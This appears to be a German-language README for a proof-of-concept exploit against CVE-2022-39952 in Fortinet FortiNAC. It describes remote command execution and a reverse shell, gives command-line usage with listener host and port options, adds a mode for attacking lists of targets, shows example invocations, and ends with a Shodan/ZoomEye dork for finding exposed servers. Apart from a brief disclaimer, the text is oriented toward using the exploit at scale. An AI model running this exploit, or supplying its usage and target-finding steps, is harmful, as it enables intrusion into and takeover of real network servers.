
Proof-of-Concept-Exploit für CVE-2022-39952, der Fortinet FortiNAC angreift und Remote-Befehlsausführung und Reverse-Shell auf verwundbaren Servern ermöglicht.
Dieser Exploit ermöglicht einem Angreifer, beliebige Befehle auf dem FortiNAC-Server auszuführen. Er basiert auf dem von horizon3ai entwickelten PoC und bietet zusätzliche Optionen für den Angriff auf mehrere Hosts.
Haftungsausschluss: Dieser Exploit dient nur zu Bildungszwecken. Bitte verwenden Sie ihn verantwortungsvoll und mit Erlaubnis.
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-l LIST, --list LIST List of targets
-lh LHOST, --lhost LHOST
The local host for the reverse shell
-lp LPORT, --lport LPORT
The local port for the reverse shell
Um diesen Exploit zu verwenden, muss Python 3.x auf Ihrem System installiert sein.
Python 3.x
requests module
concurrent.futures module
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
$ python exploit.py -t 192.168.1.100
$ python exploit.py -l targets.txt
Dieser Exploit wurde bisher nur an einer begrenzten Anzahl von Zielen getestet, daher kann seine Wirksamkeit variieren. Der Dork zum Auffinden potenzieller Ziele auf ZoomEye und Shodan lautet:
title:"FortiNAC" +"JSESSIONID"